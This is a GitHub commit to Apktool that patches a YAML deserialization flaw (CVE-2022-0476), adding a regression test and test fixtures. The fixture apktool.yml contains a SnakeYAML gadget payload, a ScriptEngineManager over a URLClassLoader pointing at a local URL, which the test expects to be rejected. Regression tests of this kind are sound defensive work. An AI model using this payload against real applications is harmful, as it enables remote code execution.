Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Preventing instantiation of untrusted classes. (#2760 - CVE-2022-0476)
* fix: enforce allowable classes during yaml parsing * fix: rename class to reference escaping nature of strings * test: assertion for parsing malicious yaml
- Loading branch information
1 parent
a269a8e
commit 4065717
Showing
6 changed files
with
108 additions
and
6 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
50 changes: 50 additions & 0 deletions
50
brut.apktool/apktool-lib/src/test/java/brut/androlib/yaml/MaliciousYamlTest.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,50 @@ | ||
/* | ||
* Copyright (C) 2010 Ryszard Wiśniewski <brut.alll@gmail.com> | ||
* Copyright (C) 2010 Connor Tumbleson <connor.tumbleson@gmail.com> | ||
* | ||
* Licensed under the Apache License, Version 2.0 (the "License"); | ||
* you may not use this file except in compliance with the License. | ||
* You may obtain a copy of the License at | ||
* | ||
* https://www.apache.org/licenses/LICENSE-2.0 | ||
* | ||
* Unless required by applicable law or agreed to in writing, software | ||
* distributed under the License is distributed on an "AS IS" BASIS, | ||
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. | ||
* See the License for the specific language governing permissions and | ||
* limitations under the License. | ||
*/ | ||
package brut.androlib.yaml; | ||
|
||
import brut.androlib.Androlib; | ||
import brut.androlib.BaseTest; | ||
import brut.androlib.TestUtils; | ||
import brut.androlib.options.BuildOptions; | ||
import brut.common.BrutException; | ||
import brut.directory.ExtFile; | ||
import brut.util.OS; | ||
import org.junit.BeforeClass; | ||
import org.junit.Test; | ||
import org.yaml.snakeyaml.constructor.ConstructorException; | ||
|
||
import java.io.File; | ||
|
||
public class MaliciousYamlTest extends BaseTest { | ||
|
||
@BeforeClass | ||
public static void beforeClass() throws Exception { | ||
TestUtils.cleanFrameworkFile(); | ||
|
||
sTmpDir = new ExtFile(OS.createTempDirectory()); | ||
sTestNewDir = new ExtFile(sTmpDir, "cve20220476"); | ||
LOGGER.info("Unpacking cve20220476..."); | ||
TestUtils.copyResourceDir(MaliciousYamlTest.class, "yaml/cve20220476/", sTestNewDir); | ||
} | ||
|
||
@Test(expected = ConstructorException.class) | ||
public void testMaliciousYamlNotLoaded() throws BrutException { | ||
BuildOptions buildOptions = new BuildOptions(); | ||
File testApk = new File(sTmpDir, "cve20220476.apk"); | ||
new Androlib(buildOptions).build(sTestNewDir, testApk); | ||
} | ||
} |
4 changes: 4 additions & 0 deletions
4
brut.apktool/apktool-lib/src/test/resources/yaml/cve20220476/AndroidManifest.xml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.ibotpeaches.cve20220476" platformBuildVersionCode="30" platformBuildVersionName="11"> | ||
<application android:debuggable="true" android:forceQueryable="true"> | ||
</application> | ||
</manifest> |
23 changes: 23 additions & 0 deletions
23
brut.apktool/apktool-lib/src/test/resources/yaml/cve20220476/apktool.yml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
!!brut.androlib.meta.MetaInfo | ||
apkFileName: cve20220476.apk | ||
compressionType: false | ||
some_var: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://127.0.0.1:8000"]]]] | ||
doNotCompress: | ||
- resources.arsc | ||
isFrameworkApk: false | ||
packageInfo: | ||
forcedPackageId: '127' | ||
renameManifestPackage: null | ||
sdkInfo: | ||
minSdkVersion: '25' | ||
targetSdkVersion: '30' | ||
sharedLibrary: false | ||
sparseResources: false | ||
usesFramework: | ||
ids: | ||
- 1 | ||
tag: null | ||
version: 2.6.1-ddc4bb-SNAPSHOT | ||
versionInfo: | ||
versionCode: null | ||
versionName: null |
4065717
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If you are reading this commit wondering why a wrong CVE was attached to this. It was reserved for this issue, but then it was revoked and reused - https://huntr.dev/bounties/d2246081-21fc-4e68-9e04-5bb4095d3624/